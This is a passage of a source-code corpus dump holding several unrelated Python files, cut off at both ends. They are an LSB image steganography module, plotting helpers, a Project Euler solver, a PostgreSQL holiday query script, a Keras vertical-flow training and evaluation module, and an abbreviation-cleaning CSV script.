i.e. 
the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n\r\n \r\n complete_char.insert(0, decoded)\r\n # we continue to do this until we have enough bits to make up a char\r\n if len(complete_char) == 8:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_char.reverse()\r\n \r\n our_char = chr(int(binary_to_string(complete_char), 2))\r\n # empty our char list\r\n complete_char = []\r\n \r\n complete_text.append(our_char)\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n \r\n \r\n \r\n if os.path.exists(\"decoded_message.txt\"):\r\n append_write = 'a' # append if already exists\r\n else:\r\n append_write = 'w' # make a new file if not\r\n \r\n secrets = open(\"decoded_message.txt\", append_write)\r\n secrets.write(binary_to_string(complete_text))\r\n secrets.close()\r\n\r\n\r\n \r\n \r\n# IMAGE LSB\r\n\"\"\"\r\nFunction that encodes an image inside another image using the LSB algorithm\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n@return: returns 0 if it could not encode, returns nothing otherwise\r\n\"\"\"\r\ndef lsb_alg_img(copyLocation):\r\n # gets our image we want to encode\r\n secret = copyLocation\r\n \r\n \r\n # we open our secret image\r\n secret_image = Image.open(secret)\r\n # pixels there are\r\n secret_width, secret_height = secret_image.size\r\n \r\n secret_size = (secret_width * secret_height)*3\r\n \r\n # WE WANT TO ITERATE THROUGH THE ENTIRE LENGTH WISE OF THE PICTURE THEN MOVE\r\n # TO THE SECOND LINE... so when we do the double loop, we want to do HEIGHT then WIDTH!\r\n \r\n \r\n cover = str(select_encoded_file())\r\n array = cover.split(\"\\'\")\r\n file = array[1]\r\n cover = file\r\n \r\n \r\n # we open our cover image\r\n cover_image = Image.open(cover)\r\n # we get the dimensions of the secret image for use in determining how many\r\n # pixels there are\r\n cover_width, cover_height = cover_image.size\r\n max_size = cover_width * cover_height\r\n \r\n #TODO: this is the check to ensure you can encode the image into the cover\r\n #TODO: handle this however you want\r\n if secret_size > max_size:\r\n print(\"Sorry, cover image is not big enough to encode in\") \r\n return 0 \r\n \r\n \r\n # loads our pixels from our cover image\r\n cover_pixs = cover_image.load()\r\n #loads our pixels from our secret image\r\n secret_pixs = secret_image.load()\r\n \r\n encode_a_0 = 254\r\n encode_a_1 = 1\r\n \r\n cover_i= 0\r\n cover_j = 0\r\n max_lsb_used = 0\r\n \r\n i = 0\r\n j = 0\r\n# we iterate through each pixel in the image we want to hide\r\n while i < secret_height:\r\n while j < secret_width:\r\n # get the bits that represent that pixel\r\n secret_bits = pixel_to_binary_list(secret_pixs[j,i])\r\n #we encode every bit in that pixel\r\n while len(secret_bits) != 0:\r\n bit_to_encode = int(secret_bits.pop(0))\r\n \r\n # just means we need to go on to the next line\r\n if cover_j == cover_width:\r\n cover_j = 0\r\n cover_i += 1\r\n # means we are at the end of our image\r\n if cover_i == cover_height:\r\n encode_a_0 = encode_a_0 & 127 # from 11111110 becomes 011111110\r\n encode_a_0 = encode_a_0 << 1 # then 11111100\r\n encode_a_0 = encode_a_0 | encode_a_1 # finally 11111101\r\n # for encoding a 1, it is quite simple: 00000001 becomes 00000010\r\n encode_a_1 = encode_a_1 << 1\r\n cover_i = 0\r\n max_lsb_used += 1\r\n 
\r\n \r\n get_cover_px = cover_pixs[cover_j, cover_i]\r\n \r\n #the section of bits that we are going to encode \r\n get_blue_bits = get_cover_px[2] \r\n \r\n \r\n if bit_to_encode == 0:\r\n # we and with 254 because we need to \"implant\" a 0 in the lsb\r\n get_blue_bits = get_blue_bits & encode_a_0\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1\r\n elif bit_to_encode == 1:\r\n get_blue_bits = get_blue_bits | encode_a_1\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1 \r\n j += 1\r\n j = 0\r\n i += 1\r\n \r\n cover_image.save(copyLocation)\r\n \r\n # writes the info we need to decode the image to a text file\r\n write_key(cover_j, cover_i, secret_width, max_lsb_used)\r\n\r\n\r\n\r\n\"\"\"\r\nFunction that decodes an image that has an image encoded inside it using the LSB algorithm\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n\"\"\"\r\ndef decode_lsb_img(copyLocation):\r\n # we get all parameters that we need to decode the encoded image\r\n key_file = select_text_file()\r\n key_array = read_key(key_file)\r\n last_j = int(key_array[0])\r\n last_i = int(key_array[1])\r\n secret_width = int(key_array[2])\r\n max_lsb_used = int(key_array[3])\r\n \r\n \r\n encoded_image = Image.open(copyLocation)\r\n cover_width, cover_height = encoded_image.size\r\n encoded_px = encoded_image.load()\r\n encode_i = 0\r\n encode_j = 0\r\n extract_a_bit = 1\r\n shift_bits = 0\r\n # holds bit values for a pixel\r\n complete_pixel = []\r\n # holds pixels that make up a line in a picture\r\n complete_line = []\r\n # holds the pixels and lines that make up the secret image\r\n complete_image = []\r\n \r\n # we iterate through the cover image\r\n while encode_i < cover_height and max_lsb_used > 0:\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. 
the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n \r\n complete_pixel.insert(0, decoded)\r\n \r\n # we continue to do this until we have enough bits to make up a pixel\r\n if len(complete_pixel) == 24:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_pixel.reverse()\r\n #RGB bits \r\n red_bits = binary_to_string(complete_pixel[0:8])\r\n green_bits = binary_to_string(complete_pixel[8:16])\r\n blue_bits = binary_to_string(complete_pixel[16:])\r\n\r\n #RGB bits converted to decimal\r\n red_value = int(red_bits, 2)\r\n green_value = int(green_bits, 2)\r\n blue_value = int(blue_bits, 2)\r\n \r\n # finally RGB transferred into pixel format\r\n decoded_pixel = (red_value, green_value, blue_value)\r\n # empty our pixel list\r\n complete_pixel = []\r\n \r\n complete_line.append(decoded_pixel)\r\n # when we have enough pixels to make up a line, we add it to the image\r\n if len(complete_line)== secret_width:\r\n complete_image.append(complete_line)\r\n complete_line = []\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n if encode_i == cover_height:\r\n encode_i = 0\r\n max_lsb_used = max_lsb_used - 1\r\n extract_a_bit = extract_a_bit << 1\r\n shift_bits += 1\r\n \r\n\r\n \r\n # we iterate through the cover image\r\n while encode_i <= last_i:\r\n if encode_i == last_i:\r\n cover_width = last_j\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n \r\n complete_pixel.insert(0, decoded)\r\n \r\n # we continue to do this until we have enough bits to make up a pixel\r\n if len(complete_pixel) == 24:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_pixel.reverse()\r\n #RGB bits \r\n red_bits = binary_to_string(complete_pixel[0:8])\r\n green_bits = binary_to_string(complete_pixel[8:16])\r\n blue_bits = binary_to_string(complete_pixel[16:])\r\n\r\n #RGB bits converted to decimal\r\n red_value = int(red_bits, 2)\r\n green_value = int(green_bits, 2)\r\n blue_value = int(blue_bits, 2)\r\n \r\n # finally RGB transferred into pixel format\r\n decoded_pixel = (red_value, green_value, blue_value)\r\n # empty our pixel list\r\n complete_pixel = []\r\n \r\n complete_line.append(decoded_pixel)\r\n # when we have enough pixels to make up a line, we add it to the image\r\n if len(complete_line)== secret_width:\r\n complete_image.append(complete_line)\r\n complete_line = []\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n \r\n # converts our array of pixels to an image that we can display\r\n array = np.array(complete_image, dtype = np.uint8)\r\n decoded_image = Image.fromarray(array)\r\n decoded_image.save(copyLocation)\r\n \r\n #spike.display_image()\r\n\r\n\r\n\r\n\"\"\"\r\nConverts a binary list into a string\r\n@param: binary_list a list of binary numbers\r\n@return: the binary_list in string form\r\n\"\"\"\r\ndef binary_to_string(binary_list):\r\n binary_string = \"\"\r\n for item in binary_list:\r\n binary_string += str(item)\r\n return binary_string\r\n\r\n\r\n\"\"\"\r\nFunction that writes the key to decode an image's secret text data.\r\n@param: cover_j the last j pixel used 
in the cover image\r\n@param: cover_i the last i pixel used in the cover image\r\n@param: max_lsb_used the highest lsb used in the cover image\r\n\"\"\"\r\ndef write_text_key(cover_j, cover_i, max_lsb_used):\r\n key_text = str(cover_j) + \", \" + str(cover_i) + \", \" + str(max_lsb_used)\r\n key = open(\"key.txt\", \"w\")\r\n key.write(key_text)\r\n \r\n key.close()\r\n #tells the user where the key was written to\r\n pid = subprocess.Popen([sys.executable, \"KeyWindow.py\"])\r\n\r\n\r\n\"\"\"\r\nFunction that writes the key to decode an image's secret image data\r\n@param: cover_j the last j pixel used in the cover image\r\n@param: cover_i the last i pixel used in the cover image\r\n@param: secret_width the width of the encoded image\r\n@param: max_lsb_used the highest lsb used in the cover image\r\n\"\"\"\r\ndef write_key(cover_j, cover_i, secret_width, max_lsb_used):\r\n key_text = str(cover_j) + \", \" + str(cover_i) + \", \" + str(secret_width) + \", \" + str(max_lsb_used)\r\n key = open(\"key.txt\", \"w\")\r\n key.write(key_text)\r\n \r\n key.close()\r\n pid = subprocess.Popen([sys.executable, \"KeyWindow.py\"])\r\n\r\n\r\n\"\"\"\r\nFunction that reads in the key and returns it as an array\r\n@param: key the path to the file that we need to read in as the key\r\n@return: the key in array form\r\n\"\"\"\r\ndef read_key(key):\r\n key = open(str(key[0]), \"r\")\r\n key_string = key.read()\r\n key_array = key_string.split(\", \")\r\n key.close()\r\n return key_array\r\n\r\n\r\n\"\"\"\r\nReturns the complete binary number of a bitlist\r\n@param: bitlist the binary number in list form\r\n@return: the binary number in decimal form\r\n\"\"\"\r\ndef getActualNum(bitlist):\r\n out = 0\r\n for bit in bitlist:\r\n out = (out << 1) | bit\r\n return out\r\n \r\n \r\n\r\n\r\n\r\n \r\n\"\"\"\r\nFunction finds the pixel coordinates of the next secret_image pixel to use\r\n@param: height the height we are currently at in the image\r\n@param: width the width we are currently at in the image\r\n@param: height_size the max height size of the image\r\n@param: width_size the max width size of the image\r\n@return: width the width we need to be on for the next pixel\r\n@return: height the height we need to be on for the next pixel\r\n@return: go if we can keep going in the cover image\r\n\"\"\"\r\ndef find_coordinates(height, width, height_size, width_size):\r\n go = True\r\n # means we are on the last pixel\r\n if width == width_size - 1 and height == height_size - 1:\r\n # since we are on the last pixel we set our go boolean to false\r\n # so the loops will stop accordingly\r\n go = False\r\n # means we are on the last pixel for this width and we need to reset \r\n elif height == height_size - 1:\r\n height = 0\r\n width += 1\r\n # otherwise, we are free to move to the next pixel to the right \r\n else:\r\n height += 1\r\n \r\n return width, height, go\r\n \r\n\r\n\"\"\"\r\nConverts a character to binary form\r\n@param: char the character to convert to binary\r\n@return: the character in binary form stored in a list\r\n\"\"\"\r\ndef char_to_binary(char):\r\n decim = ord(char)\r\n binary_char = '{0:08b}'.format(decim)\r\n return list(binary_char)\r\n \r\n# transforms a pixel to a binary string\r\n\"\"\"\r\nFunction that transforms a pixel to a binary string\r\n@param: pixel the pixel to transform to a binary string\r\n@return: a binary string in a list representing the pixel\r\n\"\"\"\r\ndef pixel_to_binary_list(pixel):\r\n # the '{}' means store the result as a string with 0 in 0:xxx as the starting\r\n # 
position. and x:08 meaning pad with 0's to the left out to the 8th digit\r\n    # the x:xxxb means store it as a binary and format(x) formats the number\r\n    # appropriately after we sum up the tuple\r\n    red_px = '{0:08b}'.format(pixel[0])\r\n    green_px = '{0:08b}'.format(pixel[1])\r\n    blue_px = '{0:08b}'.format(pixel[2])\r\n    \r\n    return list(red_px + green_px + blue_px)\r\n    \r\n","sub_path":"Spike/Steganography.py","file_name":"Steganography.py","file_ext":"py","file_size_in_byte":21099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166788780","text":"import os\nimport matplotlib.pyplot as plt\n\n# import seaborn as sns\n# sns.set()\nplt.style.use(\"dark_background\")\n\n\ndef plot_metrics(train_metrics, test_metrics):\n    (train_loss, train_accuracy) = train_metrics\n    (test_loss, test_accuracy) = test_metrics\n\n    fig, axs = plt.subplots(2, 2, figsize=(12, 8))\n    fig.suptitle(\"Metrics\")\n\n    axs[0, 0].plot(train_loss)\n    axs[0, 0].set_title(\"Training Loss\")\n\n    axs[1, 0].plot(train_accuracy)\n    axs[1, 0].set_title(\"Train Accuracy\")\n\n    axs[0, 1].plot(test_loss)\n    axs[0, 1].set_title(\"Test Loss\")\n\n    axs[1, 1].plot(test_accuracy)\n    axs[1, 1].set_title(\"Test Accuracy\")\n\n    plt.tight_layout()\n\n    plt.show()\n    # plt.savefig(\"Metrics.png\")\n    return plt\n\n\ndef plot_misclassified(misclassified, max_count):\n    print(f\"Total Misclassified: {len(misclassified)}\")\n    fig = plt.figure(figsize=(12, 10))\n    fig.suptitle(\"25 Misclassified Images\")\n    for idx, (image, prediction, target) in enumerate(misclassified[:max_count]):\n        image, prediction, target = image.cpu(), prediction.cpu(), target.cpu()\n        ax = fig.add_subplot(5, 5, 1 + idx)\n        ax.axis(\"off\")\n        ax.set_title(\n            f\"target {target.item()} \\nprediction {prediction.item()}\", fontsize=11\n        )\n        ax.imshow(image.squeeze())\n    plt.show()\n","sub_path":"CIFAR10/Session1/dl_vision/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290525828","text":"from itertools import *\n\nop = [lambda x, y: x + y, lambda x, y: x - y,\n      lambda x, y: x * y, lambda x, y: x / y if y != 0 else 0]\n\ndef count(n):\n    s = set()\n    for d1, d2, d3, d4 in permutations(n):\n        for o1, o2, o3 in product(op, repeat = 3):\n            for r in [o3(o2(o1(d1, d2), d3), d4), o2(o1(d1, d2), o3(d3, d4))]:\n                if r == int(r):\n                    s.add(int(r))\n    return next(filter(lambda x: x not in s, range(1, 999999)))\n\nans = max(combinations(range(10), 4), key = count)\nprint(''.join(map(str, ans)))\n","sub_path":"page02/93.py","file_name":"93.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115003287","text":"# Purpose: To connect to the PostgreSQL database server\n\nimport psycopg2 # the psycopg2 library is used to connect to the Postgres database\nimport time # time library is used to get current date\nfrom config import config # for readability a config file was created to read/store database connection credentials\n\ndef connect() :\n    conn = None\n    try:\n        # get connection parameters from config function\n        params = config()\n\n        # connect to the PostgreSQL server\n        print('Connecting to the PostgreSQL database...')\n        conn = psycopg2.connect(**params)\n\n        # create a cursor from established connection\n        cur = conn.cursor()\n\n        # execute our queries \n        # 1) Is the current date a holiday?\n        curr_date = 
time.strftime('%Y%m%d')\n sql = \"SELECT is_holiday FROM d_date WHERE d_date_id = %s\" % (curr_date)\n cur.execute(sql)\n is_holiday = cur.fetchone()\n print('-------------------------------------------------------------------------------------')\n print('Query 1: Is the current date [' + curr_date + '] a holiday? ' + str(is_holiday[0]))\n print('-------------------------------------------------------------------------------------')\n print('')\n # 2) Return a list of (holiday) dates, which are left in the year\n print('-------------------------------------------------------------------------------------')\n print('Query 2: Return a list of holidays that remain in the year.')\n sql = \"SELECT d_date_id FROM d_date WHERE is_holiday = TRUE AND d_date_id >= %s\" % (curr_date)\n cur.execute(sql)\n remaining_holidays = [row[0] for row in cur.fetchall()]\n print(remaining_holidays)\n print('-------------------------------------------------------------------------------------')\n # close the communication w/ the Postgre server\n cur.close()\n except(Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection is closed.')\n\nif __name__ == '__main__' : connect()","sub_path":".vscode/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"80447229","text":"\"\"\"\nCopyright 2020 The Johns Hopkins University Applied Physics Laboratory LLC\nAll rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n#Approved for public release, 20-563\n\nimport sys\nsys.path.append(\"..\")\n\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nfrom glob import glob\nfrom keras.layers import Input\nfrom keras.models import load_model\nfrom keras.callbacks import TensorBoard,ModelCheckpoint\nimport json\nimport cv2\nimport multiprocessing\n\nfrom segmentation_models import UnetFlow\nfrom utilities.misc_utils import get_data,get_batch_inds,load_image,save_image,no_nan_mse,image_preprocess,load_vflow,get_checkpoint_dir\nfrom utilities.augmentation import augment,rotate_image,rotate_xydir\n\nignore_value = -10000\n\ndef train(args):\n train_data = get_data(args, is_train=True)\n val_data = get_data(args, is_train=False, rgb_paths_only=True)\n train_datagen, val_datagen, model = build_model(args, train_data, val_data)\n \n checkpoint_dir,_ = get_checkpoint_dir(args)\n \n checkpoint_filepath = os.path.join(checkpoint_dir, \"weights.{epoch:02d}.hdf5\")\n checkpoint = ModelCheckpoint(filepath=checkpoint_filepath, monitor=\"loss\", verbose=0, save_best_only=False,\n save_weights_only=False, mode=\"auto\", period=args.save_period)\n \n tensorboard = TensorBoard(log_dir=args.tensorboard_dir, write_graph=False)\n \n callbacks_list = [checkpoint, tensorboard]\n \n model.fit_generator(generator=train_datagen,\n steps_per_epoch=(len(train_data) / args.batch_size + 1),\n epochs=args.num_epochs, \n callbacks=callbacks_list)\n \ndef 
test(args):\n    rgb_paths = get_data(args, is_train=False, rgb_paths_only=True)\n    \n    sub_dir = None\n    if args.test_model_file is not None:\n        weights_path = args.test_model_file\n    else:\n        checkpoint_dir,sub_dir = get_checkpoint_dir(args)\n        weights_paths = glob(os.path.join(checkpoint_dir, \"*.hdf5\"))\n        nums = [int(path.split(\".\")[-2]) for path in weights_paths]\n        weights_path = weights_paths[np.argsort(nums)[-1]]\n    \n    model = load_model(weights_path, compile=False)\n    \n    predictions_dir = args.predictions_dir if sub_dir is None else os.path.join(args.predictions_dir, sub_dir)\n    if not os.path.isdir(predictions_dir):\n        os.makedirs(predictions_dir)\n    \n    \n    angles = [angle for angle in range(0,360,36)] if args.test_rotations else [0]\n    \n    for rgb_path in tqdm(rgb_paths):\n        basename = os.path.basename(rgb_path).replace(\"_RGB_\", \"_\").replace(\".tif\", \"\")\n        image = load_image(rgb_path)\n        \n        for angle in angles:\n            \n            out_dir_path = os.path.join(predictions_dir, basename + \"_angle_%d_DIRPRED.json\" % angle)\n            out_mag_path = os.path.join(predictions_dir, basename + \"_angle_%d_MAGPRED.tif\" % angle)\n            out_agl_path = os.path.join(predictions_dir, basename + \"_angle_%d_AGLPRED.tif\" % angle)\n            \n            image_rotated = rotate_image(np.copy(image), None, None, angle, image_only=True)\n            image_rotated = image_preprocess(image_rotated)\n            pred = model.predict(np.expand_dims(image_rotated, axis=0))\n            agl = None\n            \n            if len(pred)==2:\n                xydir,mag = pred\n            else:\n                xydir,mag,agl = pred\n\n            xydir = xydir[0,:].tolist()\n            mag = mag[0,:,:,0]\n\n            json.dump(xydir, open(out_dir_path, \"w\"))\n            save_image(mag, out_mag_path)\n            if agl is not None:\n                agl = agl[0,:,:,0]\n                save_image(agl, out_agl_path)\n    \n    \ndef get_current_metrics(item):\n    vflow_gt_path,agl_gt_path,dirpred_path,magpred_path,aglpred_path, angle = item\n    # wrap the stored direction list in an array so it can be normalized in place below\n    dir_pred = np.array(json.load(open(dirpred_path, \"r\")))\n    mag_pred = load_image(magpred_path)\n    agl_pred = None if not os.path.isfile(aglpred_path) else load_image(aglpred_path)\n\n    agl_gt = load_image(agl_gt_path)\n    \n    vflow_gt,mag_gt,xdir_gt,ydir_gt,_ = load_vflow(vflow_gt_path, agl_gt)\n    \n    if angle != 0:\n        _,mag_gt,agl_gt = rotate_image(None, mag_gt, agl_gt, angle, image_only=False)\n        xdir_gt,ydir_gt = rotate_xydir(xdir_gt, ydir_gt, angle)\n\n    dir_gt = np.array([xdir_gt,ydir_gt])\n    dir_gt /= np.linalg.norm(dir_gt)\n    \n    \n    vflow_gt = cv2.merge((mag_gt*dir_gt[0], mag_gt*dir_gt[1]))\n\n    dir_pred /= np.linalg.norm(dir_pred)\n\n    cos_ang = np.dot(dir_pred, dir_gt)\n    sin_ang = np.linalg.norm(np.cross(dir_pred,dir_gt))\n    rad_diff = np.arctan2(sin_ang, cos_ang)\n    angle_error = np.degrees(rad_diff)\n\n    vflow_pred = cv2.merge((mag_pred*dir_pred[0], mag_pred*dir_pred[1]))\n\n    mag_error = np.nanmean(np.abs(mag_pred-mag_gt))\n    epe = np.nanmean(np.sqrt(np.sum(np.square(vflow_gt-vflow_pred), axis=2)))\n    agl_error = None if agl_pred is None else np.nanmean(np.abs(agl_pred-agl_gt))\n    \n    return angle_error,mag_error,epe,agl_error\n    \ndef metrics(args):\n    predictions_dir = args.predictions_dir \n    \n    _,sub_dir = get_checkpoint_dir(args)\n    \n    dirpred_paths = glob(os.path.join(predictions_dir, sub_dir, \"*_DIRPRED.json\"))\n    \n    angle_error, mag_error, epe, agl_error = [],[],[],[]\n    \n    items = []\n    for dirpred_path in tqdm(dirpred_paths):\n        magpred_path = dirpred_path.replace(\"_DIRPRED.json\", \"_MAGPRED.tif\")\n        aglpred_path = dirpred_path.replace(\"_DIRPRED.json\", \"_AGLPRED.tif\")\n        \n        basename = os.path.basename(magpred_path)\n        underscores = [ind for ind,val in enumerate(basename) if val==\"_\"]\n        \n        angle = 
int(basename.split(\"_\")[-2])\n        \n        if not args.test_rotations and angle != 0:\n            continue\n        \n        vflow_name = basename[:underscores[2]] + \"_VFLOW\" + basename[underscores[2]:underscores[3]] + \".json\"\n        agl_name = vflow_name.replace(\"_VFLOW_\", \"_AGL_\").replace(\".json\", \".tif\")\n        vflow_gt_path = os.path.join(args.dataset_dir, \"test\", vflow_name)\n        agl_gt_path = os.path.join(args.dataset_dir, \"test\", agl_name)\n        \n        items.append((vflow_gt_path,agl_gt_path,dirpred_path,magpred_path,aglpred_path,angle))\n    \n    if args.multiprocessing:\n        pool = multiprocessing.Pool()\n        results = list(tqdm(pool.imap_unordered(get_current_metrics, items), total=len(items)))\n        pool.close()\n        pool.join()\n    else:\n        results = [get_current_metrics(item) for item in tqdm(items)]\n    \n    for result in results:\n        curr_angle_error,curr_mag_error,curr_epe,curr_agl_error = result\n        angle_error.append(curr_angle_error)\n        mag_error.append(curr_mag_error)\n        epe.append(curr_epe)\n        if curr_agl_error is not None:\n            agl_error.append(curr_agl_error)\n    \n    mean_angle_error = np.nanmean(angle_error)\n    mean_mag_error = np.nanmean(mag_error)\n    mean_epe = np.nanmean(epe)\n    if len(agl_error) > 0:\n        mean_agl_error = np.nanmean(agl_error)\n\n    fid = open(os.path.join(args.predictions_dir, \"metrics_\" + sub_dir + \".txt\"), \"w\")\n    fid.write(\"Angle error: %f\\n\" % mean_angle_error)\n    fid.write(\"Mag error: %f\\n\" % mean_mag_error)\n    fid.write(\"EPE: %f\\n\" % mean_epe)\n    if len(agl_error) > 0:\n        fid.write(\"AGL error: %f\\n\" % mean_agl_error)\n    fid.close()\n\n    print(\"Angle error: %f\" % mean_angle_error)\n    print(\"Mag error: %f\" % mean_mag_error)\n    print(\"EPE: %f\" % mean_epe)\n    if len(agl_error) > 0:\n        print(\"AGL error: %f\" % mean_agl_error)\n    \n\ndef image_generator(data, args):\n    idx = np.random.permutation(len(data))\n    while True:\n        batch_inds = get_batch_inds(idx, args.batch_size)\n        for inds in batch_inds:\n            img_batch,label_batch = load_batch(inds, data, args)\n            yield (img_batch, label_batch)\n    \ndef load_batch(inds, data, args):\n    \n    xydir_batch = np.zeros((len(inds), 2))\n    mag_batch = np.zeros((len(inds), args.image_size[0], args.image_size[1], 1))\n    image_batch = np.zeros((len(inds), args.image_size[0], args.image_size[1], 3))\n    if args.add_height:\n        agl_batch = np.zeros((len(inds), args.image_size[0], args.image_size[1], 1))\n\n    for batch_ind,ind in enumerate(inds):\n\n        rgb_path,vflow_path,agl_path = data[ind]\n\n        image = load_image(rgb_path)\n        agl = load_image(agl_path)\n        vflow,mag,xdir,ydir,angle_orig = load_vflow(vflow_path, agl)\n\n        if args.augmentation:\n            image,mag,xdir,ydir,agl = augment(image, mag, xdir, ydir, agl=agl)\n\n        xydir_batch[batch_ind,0] = xdir\n        xydir_batch[batch_ind,1] = ydir\n        \n        image_batch[batch_ind,:,:,:] = image\n        mag_batch[batch_ind,:,:,0] = mag\n        if args.add_height:\n            agl_batch[batch_ind,:,:,0] = agl\n    \n    mag_batch[np.isnan(mag_batch)] = ignore_value \n    gt_batch = {\"xydir\":xydir_batch, \"mag\":mag_batch}\n    if args.add_height:\n        agl_batch[np.isnan(agl_batch)] = ignore_value\n        gt_batch[\"agl\"] = agl_batch\n    \n    image_batch = image_preprocess(image_batch)\n    \n    return image_batch, gt_batch\n\ndef build_model(args, train_data, val_data):\n    \n    train_datagen = image_generator(train_data, args)\n    val_datagen = image_generator(val_data, args)\n\n    input_tensor = Input(shape=(args.image_size[0], args.image_size[1], 3))\n    input_shape = (args.image_size[0], args.image_size[1], 3)\n    \n    model = UnetFlow(input_shape=input_shape, input_tensor=input_tensor, \n                     backbone_name=args.backbone, 
encoder_weights=\"imagenet\", add_height=args.add_height)\n \n if args.continue_training_file is not None:\n model.load_weights(args.continue_training_file)\n\n loss = {\"xydir\":\"mse\", \"mag\":no_nan_mse}\n loss_weights = {\"xydir\": 1.0, \"mag\":1.0}\n if args.add_height:\n loss[\"agl\"] = no_nan_mse\n loss_weights[\"agl\"] = 1.0\n \n model.compile(\"Adam\", loss=loss, loss_weights=loss_weights)\n \n return train_datagen, val_datagen, model\n\n","sub_path":"utilities/ml_utils.py","file_name":"ml_utils.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450846396","text":"# \n# For discipline-specific abbreviations, store the\n# dictionary into the \"shortforms.csv\" with the\n# \"shortform - longform\" format.\n#\n\nimport csv, string, re, sqlite3, math\n\n# process dictionary\ndictPath = \"tools\\dict.csv\"\ndictReader = csv.reader(open(dictPath, 'r'), delimiter = ',')\nelements = next(dictReader)\nblacklist = next(dictReader)\nstoppers = next(dictReader)\ndoubles = next(dictReader)\n\n# process disciplines\nuniPath = \"tools\\shortforms.csv\"\nuniReader = csv.reader(open(uniPath, 'r'), delimiter = ',')\nnext(uniReader)\nuniversals = []\n\nfor row in uniReader:\n universals += [row]\n\n\ndef main():\n\n inPath = \"raw.csv\"\n outPath = \"checked.csv\"\n abbrevPath = \"abbrev.csv\"\n execute(inPath, outPath, abbrevPath)\n\ndef execute(inPath, outPath, abbrevPath):\n\n print(\"Getting abbreviations...\")\n \n grab_table_write_table(inPath, abbrevPath, \"sentences\", \"document\")\n #grab_table_write_table(inPath, abbrevPath, input(\"Sentence header?: \"), input(\"Document header?: \"))\n\n \n print(\"Done.\")\n\n print(\"Cleaning table...\")\n cleanTable(inPath, abbrevPath, outPath, \"term\", \"originals\", \"document\")\n print(\"Done.\")\n\ndef cleanTable(inPath, abbrevPath, outPath, termName, origName, docName):\n\n # file processing\n inFile = open(inPath, 'r')\n inReader = csv.reader(inFile, delimiter = \"\\t\")\n\n \n header = next(inReader)\n print(header)\n termIndex = header.index(termName)\n origIndex = header.index(origName)\n docIndex = header.index(docName)\n \n abbrevFile = open(abbrevPath, 'r')\n abbrevReader = csv.reader(abbrevFile)\n\n outFile = open(outPath, 'w')\n outWriter = csv.writer(outFile, lineterminator = \"\\n\")\n\n outWriter.writerow([\"terms\",\"original\",\"sentences\",\"document-jargon ID\", \"jargon\", \"upperform\", \"frequency\"])\n\n # find all abbreviations used for a given document\n docAbbs = dict()\n for abbRow in abbrevReader:\n if not abbRow[6] == \"Yes\":\n ID = abbRow[2]\n if ID in docAbbs:\n docAbbs[ID] += [[abbRow[0],abbRow[1], abbRow[3]]]\n else:\n docAbbs[ID] = [[abbRow[0],abbRow[1], abbRow[3]]]\n\n # fix rows and write the new row\n for inRow in inReader:\n \n docID = inRow[docIndex]\n if docID in docAbbs:\n abbrevs = docAbbs[docID]\n else:\n abbrevs = []\n\n outWriter.writerow(fixRow(inRow, abbrevs, termIndex, origIndex))\n \n\ndef fixRow(inRow, shortforms, termIndex, origIndex):\n \n term = inRow[termIndex]\n orig = inRow[origIndex]\n\n jargon = []\n upperform = term\n frequency = []\n\n # use the generated shortforms\n for sf in shortforms:\n\n abbrev = re.sub('[()]', '', sf[1])\n\n sfPresent = abbrev.lower() in term.split(\":\")\n lfPresent = sf[0].lower() in orig.lower()\n\n if sfPresent and not lfPresent:\n jargon += [[sf[0], abbrev]]\n upperform += \" \" + sf[0].lower()\n frequency += [[abbrev, sf[2]]]\n \n if lfPresent and not 
